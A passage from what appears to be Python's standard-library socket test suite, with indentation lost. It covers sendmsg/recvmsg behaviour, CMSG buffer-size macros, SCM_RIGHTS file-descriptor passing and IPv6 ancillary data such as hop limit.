with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(sys.platform.startswith("aix"), "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
